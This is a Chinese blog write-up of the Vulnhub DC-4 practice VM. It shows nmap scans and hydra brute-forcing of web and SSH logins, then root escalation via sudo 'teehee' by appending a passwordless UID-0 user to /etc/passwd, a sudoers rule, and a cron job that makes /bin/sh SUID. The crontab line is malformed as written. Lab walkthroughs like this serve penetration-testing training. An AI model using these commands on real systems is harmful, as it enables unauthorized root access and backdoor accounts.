[Vulnhub] DC-4

最新推荐文章于 2024-04-29 01:17:30 发布
最新推荐文章于 2024-04-29 01:17:30 发布
阅读量823 收藏 1
点赞数 1
分类专栏: Vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/128778512
版权

下载链接:https://download.vulnhub.com/dc/DC-4.zip

 同DC-3 这个靶机也是只有一个flag。

  • 全面信息搜集
  • hydra爆破登录和ssh密码
  • teehee命令(写入文件内容)提权
  • /etc/passwd & /etc/sudoers 文件利用

目录

<1> 信息搜集

<2> hydra爆破登录密码

<3> Privilege Escalation(提权)

(1)teehee添加root权限组用户提权

 (2)写入/etc/sudoers令charles获得(root)ALL权限

(3) 写入定时任务执行脚本提权

<1> 信息搜集

扫一下靶机的ip

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.134

nmap -A -p 1-65535 192.168.236.134 扫描一下靶机开放哪些服务

开放了22端口的ssh服务,以及80端口的http服务

尝试弱口令登录 失败。。

<2> hydra爆破登录密码

hydra 爆破一下admin的密码(burp的repeater模块也可以)

hydra -l admin -P /home/kali/Desktop/rockyou.txt 192.168.236.134 http-form-post '/login.php:username=^USER^&password=^PASS^:S=logout'

密码为 happy

在Web表单中成功使用它的关键是确定表单对失败登录的响应方式与成功登录的响应方式。 如确定失败的登录消息,如怎么识别出成功的消息并使用它。 要使用成功的消息,我们将使用“S =成功消息”替换失败的登录消息

登录 看见了执行命令的接口 /command.php

 抓包 发现参数为radio

进入家目录 发现了三个用户 charles  jim 和sam

 只能对jim操作  cd /home/jim 发现了backups

 看见了 旧密码的备份文件或许可以用来爆破用户密码

把他cat出来 复制到kali的pass.txt 里  三个用户写入user.txt

hydra爆破用户密码

hydra -L user.txt -P pass.txt 192.168.236.134 ssh

只爆出来了jim的密码 哈哈哈 毕竟在jim那里找到的,其他人爆不出来也没关系

我们 ssh登录jim   ssh jim@192.168.236.134

登录之后看见一句  you have mail

我们find / -name  *mail* 找到 /var/spool/mail 里有jim的mail

得到charles的密码  ^xHhA&hvim0y

<3> Privilege Escalation(提权)

charles用户 teehee命令有root权限

teehee --help  发现teehee的参数a可以在文件后面加入内容

(1)teehee添加root权限组用户提权

 /etc/passwd文件格式
root:xx:0:0:root:/root:/bin/bash
用户名:密码(x代表加密密码):UID:GID:用户全名或本地账号:家目录:登陆后的终端命令

这里我们执行

echo "1vxyz::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

然后 su 1vxyz即可 得到root权限

 (2)写入/etc/sudoers令charles获得(root)ALL权限

echo "charles ALL=(root) ALL" | sudo teehee -a /etc/sudoers

 sudo su  输入charles密码 成功提权为root  (也可以sudo vi   然后末尾 :!/bin/bash)

(3) 写入定时任务执行脚本提权

通过teehee的sudo提升权限以 root身份写入crontab计划任务通过执行获取root权限

crontab的基本格式:

f1  f2  f3  f4  f5  command

分 时     日  月  周  命令

时间部分全部填写为*,这样默认这个定时任务每分钟执行一次,可以根据情况自行设定。通过执行的脚本将/bin/sh的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限

echo "****root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

葫芦娃42
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
生命在于学习——Linux提权
易水哲的博客
11-03 1654
Linux提权的学习笔记记录。
DC-4靶机渗透(teehee提权)
single_g_l的博客
03-26 4770
一、环境 靶机: 192.168.1.177 攻击机: 192.168.1.209 二、信息收集 1. 主机发现 namp -sP 192.168.1.0/24 或 arp-scan -l # 查看开放端口 nmap -A -sS -p- 192.168.1.177 2. 访问192.168.1.177:80 三、拿到管理后台密码 方法1. 用burp爆破模块,获取管理员登录界面的密码 01. 用burp抓包,爆破拿到密码(记得准备一个常用密码合集,...
Vulnhub靶机:DC-4渗透详细过程
菜鸟学渗透
04-29 347
Vulnhub靶机:DC-4渗透详细过程
DC-4靶机teehee的两种提权
laykr的博客
12-04 456
原理:通过日志更改/bin/bash,使其变成4777也就是suid权限,然后/bin/bash -p强制停下,就有root权限了。原理: 直接修改/etc/passwd文件,追加一个空密码进入/etc/passwd里。东西不多,个人笔记,记录今天的学习成果。1.修改/etc/passwd。2.修改/bin/bash权限。
vulnhub靶场之DC-4
qq_58091216的博客
01-09 1046
继续探索在/var/spool/mail目录下发现一封名为jim的邮件邮件内容大致为:我今天要去度假了,所以老板让我给你我的密码,以防有什么事情发生错了。也就是说这里我们又拿到了一个用户名和密码。查看系统里面有什么文件在/home/jim/backups下看到一个old-passwords.bak文件,看名字应该是一堆密码,而且是jim用户使用过的密码。命令的意思大致利用teehee为把如下信息写到/etc/passwd里面,在用户名admin 没有密码为管理员权限,进入的时候运行/bin/bash。
DC-4靶场练习—teehee提权
negnegil的博客
06-09 607
DC系列第四个靶机 下载地址:https://www.vulnhub.com/entry/dc-4,313/ 老规矩先扫描以下局域网内的主机ip arp-scan -l 扫一下端口: nmap -A -p- 192.168.1.101 只看放了22和80端口,先进80端口看看有什么 只有一个表单,猜测Username应该是admin,先不急着爆破。 用dirsearch扫了一下目录,只有一个登录界面: 所以现在只能从80或22端口找突破口了,22端口需要同时爆破账号和密码,太麻烦而且也不知道能不
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Linux提权————Linux下三种不同方式的提权技巧
Fly_鹏程万里
05-16 3881
在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到获取到低权限SHELL后我们通常做下面几件事1.检测操作系统的发...
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 345
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1922
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4587
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
vulnhub靶机DC4
weixin_52450702的博客
11-02 613
dc-4靶机ip:192.168.70.163靶机下载地址:https://download.vulnhub.com/dc/DC-4.zip.torrent。
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1744
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1117
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2378
Vulnhub-DC-4靶机实战
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值